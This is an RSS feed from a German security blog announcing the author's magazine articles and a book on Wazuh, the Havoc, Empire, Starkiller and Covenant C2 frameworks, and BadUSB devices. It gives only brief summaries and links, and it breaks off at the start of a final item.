<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Bücher und Artikel Archive -</title>
	<atom:link href="https://pentestit.de/category/penetration-testing-mit-metasploit/feed/" rel="self" type="application/rss+xml" />
	<link>https://pentestit.de/category/penetration-testing-mit-metasploit/</link>
	<description>Yet Another Infosec Website</description>
	<lastBuildDate>Thu, 06 Nov 2025 18:55:14 +0000</lastBuildDate>
	<language>de</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9</generator>
	<item>
		<title>Ausgabe der iX Special 2025 – Securitytools erschienen</title>
		<link>https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/</link>
					<comments>https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Thu, 06 Nov 2025 16:56:50 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Open Source]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5201</guid>

					<description><![CDATA[<p>Ich freue mich sehr, Ihnen heute unser neue Ausgabe des&#160;iX Special 2025 – Security Tools&#160;vorstellen zu dürfen – ein Sonderheft, [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/">Ausgabe der iX Special 2025 – Securitytools erschienen</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Ich freue mich sehr, Ihnen heute unser neue Ausgabe des&nbsp;<a href="https://www.heise.de/select/ix/2025/13">iX Special 2025 – Security Tools&nbsp;</a>vorstellen zu dürfen – ein Sonderheft, das sich voll und ganz dem Thema Open Source-Sicherheitstools widmet. In dieser Ausgabe finden Sie eine breite Auswahl an frei verfügbaren Werkzeugen für Schwachstellenanalyse, Systemhärtung, Erkennung von Angriffen und die anschließende Reaktion.&nbsp;</p>



<figure class="wp-block-image size-full is-resized"><a href="https://www.heise.de/select/ix/2025/13"><img fetchpriority="high" decoding="async" width="477" height="676" src="https://pentestit.de/wp-content/uploads/2025/11/iX-special-2025.jpg" alt="" class="wp-image-5202" style="width:245px;height:auto" srcset="https://pentestit.de/wp-content/uploads/2025/11/iX-special-2025.jpg 477w, https://pentestit.de/wp-content/uploads/2025/11/iX-special-2025-212x300.jpg 212w" sizes="(max-width: 477px) 100vw, 477px" /></a></figure>



<p>Weitere Informationen über <a href="https://frankneugebauer.eu/2025/11/06/ausgabe-der-ix-special-2025-securitytools-erschienen/">meinen Beitrag zum Sonderheft findet man hier</a>.</p>
<p>Der Beitrag <a href="https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/">Ausgabe der iX Special 2025 – Securitytools erschienen</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/ausgabe-der-ix-special-2025-securitytools-erschienen/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Wazuh auf einem Raspberry Pi 4 installieren</title>
		<link>https://pentestit.de/wazuh-auf-einem-raspberry-pi-4-installieren/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Fri, 23 May 2025 12:33:55 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Howto]]></category>
		<category><![CDATA[Raspberry Pi]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5179</guid>

					<description><![CDATA[<p>Dieser Blogeintrag beschreibt, wie man die Open-Source-Sicherheitsplattform Wazuh auf einem Raspberry Pi 4 installiert und einrichtet. Ziel ist es, ein [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/wazuh-auf-einem-raspberry-pi-4-installieren/">Wazuh auf einem Raspberry Pi 4 installieren</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Dieser <a href="https://wazuh.frankneugebauer.eu/wazuh-auf-raspberry-pi-4-installieren/">Blogeintrag</a> beschreibt, wie man die Open-Source-Sicherheitsplattform Wazuh auf einem Raspberry Pi 4 installiert und einrichtet. Ziel ist es, ein günstiges und leistungsfähiges SIEM-System (Security Information and Event Management) für kleine Netzwerke oder den Heimgebrauch bereitzustellen, da kommerzielle Lösungen oft zu teuer oder komplex sind.</p>



<p>Die Anleitung führt durch folgende Schritte:</p>



<ul class="wp-block-list">
<li>Vorbereitung des Raspberry Pi 4, meist mit einem aktuellen Raspberry Pi OS (ARM64).</li>



<li>Installation der benötigten Softwarepakete und Hinzufügen des Wazuh-Repositorys.</li>



<li>Installation und Konfiguration der Wazuh-Komponenten (z. B. Agent, Server, Dashboard) auf dem Raspberry Pi.</li>



<li>Starten und Aktivieren der Wazuh-Dienste, damit sie beim Systemstart automatisch laufen.</li>



<li>Abschließend Zugriff auf das Wazuh Dashboard zur Überwachung und Verwaltung der Sicherheitsereignisse.</li>
</ul>



<p>Der <a href="https://wazuh.frankneugebauer.eu/wazuh-auf-raspberry-pi-4-installieren/">Blogeintrag</a> hebt hervor, dass die Installation zwar einige Schritte erfordert, aber mit der Anleitung auch für Einsteiger nachvollziehbar ist. Das Ergebnis ist eine kostengünstige, aber leistungsfähige Sicherheitslösung für kleine Netzwerke.</p>



<p></p>
<p>Der Beitrag <a href="https://pentestit.de/wazuh-auf-einem-raspberry-pi-4-installieren/">Wazuh auf einem Raspberry Pi 4 installieren</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz</title>
		<link>https://pentestit.de/ix-01-2025-wazuh-freie-sicherheitsplattform-wazuh-im-einsatz/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sun, 29 Dec 2024 10:32:33 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[iX]]></category>
		<category><![CDATA[iX Magazin]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5144</guid>

					<description><![CDATA[<p>Wazuh ist eine lizenzkostenfreie und quelloffene Sicherheitsplattform, die Extended Detection and Response (XDR) und Security Information and Event Management (SIEM) [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-01-2025-wazuh-freie-sicherheitsplattform-wazuh-im-einsatz/">iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Wazuh ist eine lizenzkostenfreie und quelloffene Sicherheitsplattform, die Extended Detection and Response (XDR) und Security Information and Event Management (SIEM) kombiniert. Mittlerweile wird sie von einer weltweiten Open-Source-Sicherheits-Community unterstützt, die dem Entwicklungsteam zur Seite steht und so zum Erfolg des Projekts beiträgt. Die Plattform vereint verschiedene Sicherheitsfunktionen wie Intrusion Detection, Log Management, Compliance Management und Vulnerability Management in einem System. Diese Vielzahl an Funktionen kann überwältigend sein. Dieser zweite Teil der Artikelserie begleitet beim Einstieg in den praktischen Einsatz von Wazuh im Unternehmen. <a href="https://www.heise.de/select/ix/2025/1/2429811514830053491">Jetzt Teil 2 lesen!</a></p>



<p></p>
<p>Der Beitrag <a href="https://pentestit.de/ix-01-2025-wazuh-freie-sicherheitsplattform-wazuh-im-einsatz/">iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source</title>
		<link>https://pentestit.de/ix-12-2024-wazuh-unternehmenssicherheit-mit-open-source/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sun, 24 Nov 2024 09:50:15 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[iX Magazin]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5141</guid>

					<description><![CDATA[<p>Die Open-Source-Sicherheitsplattform Wazuh unterscheidet sich von anderen Open-Source-Tools durch die vollständige Integration verschiedener Sicherheitsfunktionen wie Host-Monitoring mit IDS OSSEC oder [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-12-2024-wazuh-unternehmenssicherheit-mit-open-source/">iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Die Open-Source-Sicherheitsplattform Wazuh unterscheidet sich von anderen Open-Source-Tools durch die vollständige Integration verschiedener Sicherheitsfunktionen wie Host-Monitoring mit IDS OSSEC oder die Analysemöglichkeiten von Elastic Stack, erweitert um Schwachstellenmanagement, Compliance-Überwachung und vieles mehr. Mit Wazuh kann ein Unternehmen eine leistungsfähige und flexible IT-Sicherheitsinfrastruktur aufbauen, ohne mehrere separate Tools verwalten zu müssen. Der&nbsp;<a href="https://www.heise.de/ratgeber/Wazuh-Unternehmenssicherheit-mit-Open-Source-gewaehrleisten-10008627.html">erste Teil dieser&nbsp;</a>zweiteiligen Artikelserie erläutert das Zusammenspiel der Wazuh-Komponenten, die Funktionen des Dashboards und die Anbindung von Endpunkten.&nbsp;</p>



<p>Es folgt ein zweiter Teil im nächsten Heft. Viele weitere interessante Artikel finden Sie&nbsp;<a href="https://www.heise.de/select/ix/2024/12">im aktuellen Heft</a>.</p>



<figure class="wp-block-image size-large"><a href="https://www.heise.de/select/ix/2024/12"><img decoding="async" width="1024" height="1024" src="https://pentestit.de/wp-content/uploads/2024/11/1732440372-1024x1024.jpg" alt="" class="wp-image-5142" srcset="https://pentestit.de/wp-content/uploads/2024/11/1732440372-1024x1024.jpg 1024w, https://pentestit.de/wp-content/uploads/2024/11/1732440372-150x150.jpg 150w, https://pentestit.de/wp-content/uploads/2024/11/1732440372-300x300.jpg 300w, https://pentestit.de/wp-content/uploads/2024/11/1732440372-768x768.jpg 768w, https://pentestit.de/wp-content/uploads/2024/11/1732440372.jpg 1500w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></figure>
<p>Der Beitrag <a href="https://pentestit.de/ix-12-2024-wazuh-unternehmenssicherheit-mit-open-source/">iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>iX 04/2024 Post-Exploitation-Framework Havoc</title>
		<link>https://pentestit.de/ix-04-2024-post-exploitation-framework-havoc/</link>
					<comments>https://pentestit.de/ix-04-2024-post-exploitation-framework-havoc/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sat, 23 Mar 2024 10:18:43 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Havoc]]></category>
		<category><![CDATA[Post Exploitation]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5055</guid>

					<description><![CDATA[<p>Im Februar 2023 beobachtete ein&#160;Forschungsteam des Zscaler ThreatLabz&#160;eine Kampagne gegen eine Regierungsorganisation, bei der die Angreifer ein neues Framework namens&#160;Havoc&#160;einsetzten. [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-04-2024-post-exploitation-framework-havoc/">iX 04/2024 Post-Exploitation-Framework Havoc</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Im Februar 2023 beobachtete ein&nbsp;<a href="https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace">Forschungsteam des Zscaler ThreatLabz&nbsp;</a>eine Kampagne gegen eine Regierungsorganisation, bei der die Angreifer ein neues Framework namens&nbsp;<a href="https://github.com/HavocFramework/Havoc">Havoc</a>&nbsp;einsetzten. Die Software ist ein quelloffenes und hoch entwickeltes Command-and-Control-Framework (C2-Framework), das als Alternative zu kostenpflichtigen Optionen wie&nbsp;<a href="https://www.cobaltstrike.com/">Cobalt Strike&nbsp;</a>und&nbsp;<a href="https://bruteratel.com/">Brute Ratel&nbsp;</a>angesehen wird. Es beherrscht verschiedene Umgehungstechniken wie indirekte Syscalls und Sleep Obfuscation und ist damit in der Lage, auch die Sicherheitsmechanismen aktueller Windows- Versionen zu umgehen. Zurzeit befindet sich das Framework noch in einer heißen Entwicklungsphase, hauptverantwortlich ist der junge&nbsp;<a href="https://twitter.com/C5pider">Entwickler 5pider</a>.</p>



<p>In dieser zweiteiligen Artikelserie beschreibe ich, wie das Havoc Framework in einer Red-Team-Kampagne oder einem Penetrationstest zum Einsatz kommen kann. Dieser&nbsp;<a href="https://shop.heise.de/ix-04-2024/print">erste Teil&nbsp;</a>beschäftigt sich mit der Installation, dem Aufbau und dem grundsätzlichen Umgang mit Listenern, Payloads und Modulen. </p>



<figure class="wp-block-image size-full is-resized"><a href="https://heise.de/-9662893"><img decoding="async" width="613" height="863" src="https://pentestit.de/wp-content/uploads/2024/03/iX-04-2024-Titelbild.png" alt="" class="wp-image-5057" style="width:373px;height:auto" srcset="https://pentestit.de/wp-content/uploads/2024/03/iX-04-2024-Titelbild.png 613w, https://pentestit.de/wp-content/uploads/2024/03/iX-04-2024-Titelbild-213x300.png 213w" sizes="(max-width: 613px) 100vw, 613px" /></a></figure>



<p>Im Heft 05/2024 erscheint der <a href="https://www.heise.de/select/ix/2024/5/2408811172164526053">zweite Teil </a>des Artikels. Dieses Tutorial gibt einen Überblick über die Möglichkeiten, die Havoc in einem kompromittierten System bietet.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="595" height="847" src="https://pentestit.de/wp-content/uploads/2024/05/iX-05-2024.png" alt="" class="wp-image-5098" style="width:372px;height:auto" srcset="https://pentestit.de/wp-content/uploads/2024/05/iX-05-2024.png 595w, https://pentestit.de/wp-content/uploads/2024/05/iX-05-2024-211x300.png 211w" sizes="auto, (max-width: 595px) 100vw, 595px" /></figure>
<p>Der Beitrag <a href="https://pentestit.de/ix-04-2024-post-exploitation-framework-havoc/">iX 04/2024 Post-Exploitation-Framework Havoc</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/ix-04-2024-post-exploitation-framework-havoc/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>iX 12/2023 – Pentesting mit der Starkiller-GUI</title>
		<link>https://pentestit.de/ix-12-2023-pentesting-mit-der-starkiller-gui/</link>
					<comments>https://pentestit.de/ix-12-2023-pentesting-mit-der-starkiller-gui/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sun, 26 Nov 2023 16:00:49 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Empire-Framework]]></category>
		<category><![CDATA[iX]]></category>
		<category><![CDATA[Starkiller]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=4946</guid>

					<description><![CDATA[<p>Das&#160;Empire Framework&#160;wurde 2021 mit einer grafischen Benutzeroberfläche ausgestattet. Die Entwickler um Vincent Rose (Vinnybod) haben dem Framework nun neues Leben [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-12-2023-pentesting-mit-der-starkiller-gui/">iX 12/2023 – Pentesting mit der Starkiller-GUI</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Das&nbsp;<a href="https://github.com/BC-SECURITY/Empire">Empire Framework</a>&nbsp;wurde 2021 mit einer grafischen Benutzeroberfläche ausgestattet. Die Entwickler um Vincent Rose (Vinnybod) haben dem Framework nun neues Leben eingehaucht, nachdem BC Security das Projekt übernommen hat. Der Sprung auf Version 5.0 sollte eigentlich nur eine verbesserte REST-API bringen, um einige Mängel der ursprünglichen API zu beheben. Es stellte sich jedoch heraus, dass dies umfangreiche Änderungen am Kerncode erforderte. Es folgte eine groß angelegte Umstrukturierung, aus der eine grafische Benutzeroberfläche hervorging.</p>



<p>Die Entwickler tauften diese grafische Benutzeroberfläche des&nbsp;<a href="https://github.com/BC-SECURITY/Starkiller">Empire-Frameworks Starkiller</a>. Ursprünglich als eigenständiges Programm entwickelt, ist die Software seit 2023 ab der Version 5.2 in den Server integriert und als Webinterface zugänglich.</p>



<p>Lesen Sie meinen <a href="https://www.heise.de/ratgeber/Empire-Framework-Erweiterung-Starkiller-GUI-fuer-das-Pentesting-Tool-9358511.html">neuen Artikel in der iX </a>– Magazin für professionelle IT.</p>



<figure class="wp-block-image aligncenter size-large is-resized"><a href="https://www.heise.de/ratgeber/Empire-Framework-Erweiterung-Starkiller-GUI-fuer-das-Pentesting-Tool-9358511.html" target="_blank" rel="noreferrer noopener"><img loading="lazy" decoding="async" width="1024" height="795" src="https://pentestit.de/wp-content/uploads/2023/11/mockuper-1024x795.png" alt="" class="wp-image-4947" style="width:684px;height:auto" srcset="https://pentestit.de/wp-content/uploads/2023/11/mockuper-1024x795.png 1024w, https://pentestit.de/wp-content/uploads/2023/11/mockuper-1536x1192.png 1536w, https://pentestit.de/wp-content/uploads/2023/11/mockuper-300x233.png 300w, https://pentestit.de/wp-content/uploads/2023/11/mockuper-768x596.png 768w, https://pentestit.de/wp-content/uploads/2023/11/mockuper.png 2000w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a></figure>
<p>Der Beitrag <a href="https://pentestit.de/ix-12-2023-pentesting-mit-der-starkiller-gui/">iX 12/2023 – Pentesting mit der Starkiller-GUI</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/ix-12-2023-pentesting-mit-der-starkiller-gui/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hacking mit Post Exploitation Frameworks</title>
		<link>https://pentestit.de/hacking-mit-post-exploitation-frameworks/</link>
					<comments>https://pentestit.de/hacking-mit-post-exploitation-frameworks/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Wed, 10 May 2023 13:35:12 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Empire-Framework]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Post Exploitation]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=4936</guid>

					<description><![CDATA[<p>Hiermit möchte ich mein neues Buch ankündigen, dass ich zusammen mit Martin Neugebauer geschrieben habe. Es wird voraussichtlich im September [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/hacking-mit-post-exploitation-frameworks/">Hacking mit Post Exploitation Frameworks</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Hiermit möchte ich mein neues Buch ankündigen, dass ich zusammen mit Martin Neugebauer geschrieben habe. Es wird voraussichtlich im September 2023 im&nbsp;<a href="https://www.hanser-kundencenter.de/fachbuch" target="_blank" rel="noreferrer noopener">Carl Hanser Verlag</a>&nbsp;erscheinen.</p>



<p><strong>Zum Inhalt:</strong></p>



<p>Um effektiv auf Cyber-Angriffe reagieren zu können, ist es unerlässlich, die aktuellen Angriffstechniken des Gegners zu kennen. Nur so ist es möglich, auf komplexe Angriffe adäquat zu reagieren und rechtzeitig geeignete Maßnahmen zu ergreifen. An dieser Stelle kommt die Phase der Post-Exploitation ins Spiel. Sie ist eine Phase des Penetrationstests, die voraussetzt, dass bereits eine Verbindung zwischen Angreifer und Ziel-IT besteht.</p>



<p>Dieses Buch befasst sich mit der Installation und dem Einsatz von Post-Exploitation-Frameworks, die Penetrationstestern helfen, mögliche Angriffsszenarien in einer sicheren Umgebung zu simulieren und Systeme auf bestehende und potenzielle Schwachstellen zu überprüfen.<br>Es führt durch den Aufbau eines Testsystems und stellt verschiedene Post-Exploitation-Tools wie Metasploit, Koadic, Empire, Covenant, Merlin, Sliver und Mythic vor. Jedes Kapitel gibt einen Überblick über die Eigenschaften, die Installation und den praktischen Einsatz des jeweiligen Frameworks anhand verschiedener Szenarien. Am Ende jedes Kapitels finden Sie Wiederholungsfragen, um Ihr Wissen zu festigen.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="694" src="https://pentestit.de/wp-content/uploads/2023/05/1683723916-1024x694.png" alt="" class="wp-image-4937" srcset="https://pentestit.de/wp-content/uploads/2023/05/1683723916-1024x694.png 1024w, https://pentestit.de/wp-content/uploads/2023/05/1683723916-1536x1041.png 1536w, https://pentestit.de/wp-content/uploads/2023/05/1683723916-2048x1388.png 2048w, https://pentestit.de/wp-content/uploads/2023/05/1683723916-300x203.png 300w, https://pentestit.de/wp-content/uploads/2023/05/1683723916-768x521.png 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p>Der Beitrag <a href="https://pentestit.de/hacking-mit-post-exploitation-frameworks/">Hacking mit Post Exploitation Frameworks</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/hacking-mit-post-exploitation-frameworks/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>iX 05/2023 – BadUSB-Stick mit WLAN</title>
		<link>https://pentestit.de/badusb-mit-wlan/</link>
					<comments>https://pentestit.de/badusb-mit-wlan/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Thu, 27 Apr 2023 09:05:02 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Malduino W]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=4921</guid>

					<description><![CDATA[<p>Spätestens seit der Sicherheitskonferenz BlackHat im Jahr 2014 ist klar, dass die USB-Schnittstelle an unseren Computern nicht so sicher ist, [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/badusb-mit-wlan/">iX 05/2023 – BadUSB-Stick mit WLAN</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Spätestens seit der Sicherheitskonferenz BlackHat im Jahr 2014 ist klar, dass die USB-Schnittstelle an unseren Computern nicht so sicher ist, wie von der Computerindustrie behauptet. Damals zeigten die<br>drei Sicherheitsforscher Karsten Nohl, Jakob Lell und Sascha Krißler der Weltöffentlichkeit ihre Methode, herkömmliche USB-Geräte mit einer speziellen Firmware zu manipulieren und als Angriffswaffe zu missbrauchen.</p>



<p>Kurze Zeit später schossen weitere Ansätze für Keystroke-Injection- Angriffe wie Pilze aus dem Boden. Besonders beliebt waren in diesem Zusammenhang USB-Geräte, die sich beim Anstecken als USB-Tastatur ausgeben. Der als Skript auf einem Speichermedium abgelegte Schadcode simuliert, dass bestimmte Tasten auf der Tastatur gedrückt werden. Das erlaubt es Befehle so auszuführen, als wären sie von einem legitimen Benutzer eingegeben worden. Ein Eindringling kann diese Art des Angriffs nutzen, um Zugriff auf vertrauliche Informationen zu erlangen oder Schadcode auf einem Computer auszuführen.</p>



<p>Der <a href="https://pentestit.de/erster-test-mit-malduiono-w-von-maltronics/" target="_blank" rel="noreferrer noopener">MalDuino W </a>kommt in einem schlanken Metallgehäuse daher, das mit einer USB-A- und einer USB-C-Schnittstelle ausgestattet ist. Wird er mit einer Stromquelle wie einem PC, einer Powerbank oder einem USB-Netzteil verbunden, baut der Stick einen eigenen WLAN- Access-Point auf, den der Nutzer über ein Webinterface konfigurieren kann.</p>



<p>Lesen Sie den ganzen Artikel in der <a href="https://www.heise.de/select/ix/2023/5" target="_blank" rel="noreferrer noopener">iX 05/2023</a>.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://pentestit.de/wp-content/uploads/2023/04/iX-05-2023-727x1024.jpg" alt="" class="wp-image-4923" width="427" height="601" srcset="https://pentestit.de/wp-content/uploads/2023/04/iX-05-2023-727x1024.jpg 727w, https://pentestit.de/wp-content/uploads/2023/04/iX-05-2023-213x300.jpg 213w, https://pentestit.de/wp-content/uploads/2023/04/iX-05-2023-768x1081.jpg 768w, https://pentestit.de/wp-content/uploads/2023/04/iX-05-2023.jpg 880w" sizes="auto, (max-width: 427px) 100vw, 427px" /></figure>
<p>Der Beitrag <a href="https://pentestit.de/badusb-mit-wlan/">iX 05/2023 – BadUSB-Stick mit WLAN</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/badusb-mit-wlan/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>iX 01/2023 &#8211; Post-Exploitation für .NET</title>
		<link>https://pentestit.de/ix-01-2023-post-exploitation-fuer-net/</link>
					<comments>https://pentestit.de/ix-01-2023-post-exploitation-fuer-net/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Fri, 23 Dec 2022 12:05:42 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Post Exploitation]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=4894</guid>

					<description><![CDATA[<p>Wer das englische Wörterbuch bemüht, um das Wort „Covenant“ nachzuschlagen, wird eine Reihe von Übersetzungen finden. Welche Bedeutung der Entwickler [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-01-2023-post-exploitation-fuer-net/">iX 01/2023 &#8211; Post-Exploitation für .NET</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://pentestit.de/wp-content/uploads/2022/12/ix_1280x720px_1-23-1024x576.jpg" alt="" class="wp-image-4895" srcset="https://pentestit.de/wp-content/uploads/2022/12/ix_1280x720px_1-23-1024x576.jpg 1024w, https://pentestit.de/wp-content/uploads/2022/12/ix_1280x720px_1-23-300x169.jpg 300w, https://pentestit.de/wp-content/uploads/2022/12/ix_1280x720px_1-23-768x432.jpg 768w, https://pentestit.de/wp-content/uploads/2022/12/ix_1280x720px_1-23.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p>Wer das englische Wörterbuch bemüht, um das Wort „<a href="https://github.com/cobbr/Covenant/wiki" target="_blank" rel="noreferrer noopener">Covenant</a>“ nachzuschlagen, wird eine Reihe von Übersetzungen finden. Welche Bedeutung der Entwickler Ryan Cobb allerdings im Sinn hatte, wird offenkundig sein Geheimnis bleiben. Hat man sich mit dem Framework aber etwas näher beschäftigt, so wird einem die Aussage Abkommen, Bündnis oder Vertrag hinsichtlich der Kollaborationsfähigkeit der Software plausibel erscheinen.&nbsp;</p>



<p>Auf der <a href="https://github.com/cobbr/Covenant/wiki" target="_blank" rel="noreferrer noopener">Projektseite</a> beschreiben die Entwickler ihre Anwendung als „.Net Command und Control Framework“, das darauf abzielt, die Angriffsfläche von .Net hervorzuheben. Gleichzeitig verdeutlicht es, wie Microsofts Software als einfache Befehls- und Steuerungsplattform genutzt werden kann, um die Arbeit von Red Teams zu unterstützen.</p>



<p>Schon auf dem ersten Blick fällt die ansprechend gestaltete Weboberfläche ins Auge, die auch Anwender mit minimalen Kenntnissen auf diesem Gebiet den Einstieg erleichtert. Erfahrene Nutzer werden sofort Listener, Launcher und Tasks bereitstellen können, ohne einen Blick in das Wiki&nbsp;zu werfen.&nbsp;</p>



<p>Covenant bietet viele ähnliche Funktionalitäten wie kommerzielle Post-Exploitation-Frameworks und weist insbesondere Parallelen mit&nbsp;<a href="https://www.cobaltstrike.com/" target="_blank" rel="noreferrer noopener">Cobalt Strike</a>&nbsp;auf. Der reichhaltige Funktionsumfang, die einfache Anpassung und die plattformübergreifende Kompatibilität machen es zu einer großartigen Option für Red Teams und Penetrationstester.&nbsp;</p>



<p>Lesen Sie meinen kompletten Artikel im Magazin für professionelle Informationstechnik&nbsp;<a href="https://www.heise.de/select/ix/2023/1" target="_blank" rel="noreferrer noopener">iX – 01/2023</a>.</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-01-2023-post-exploitation-fuer-net/">iX 01/2023 &#8211; Post-Exploitation für .NET</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/ix-01-2023-post-exploitation-fuer-net/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Backdoor Roman &#8211; Spoiler Alarm!</title>
		<link>https://pentestit.de/backdoor-roman-spoiler-alarm/</link>
					<comments>https://pentestit.de/backdoor-roman-spoiler-alarm/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sat, 27 Mar 2021 17:27:02 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[Howto]]></category>
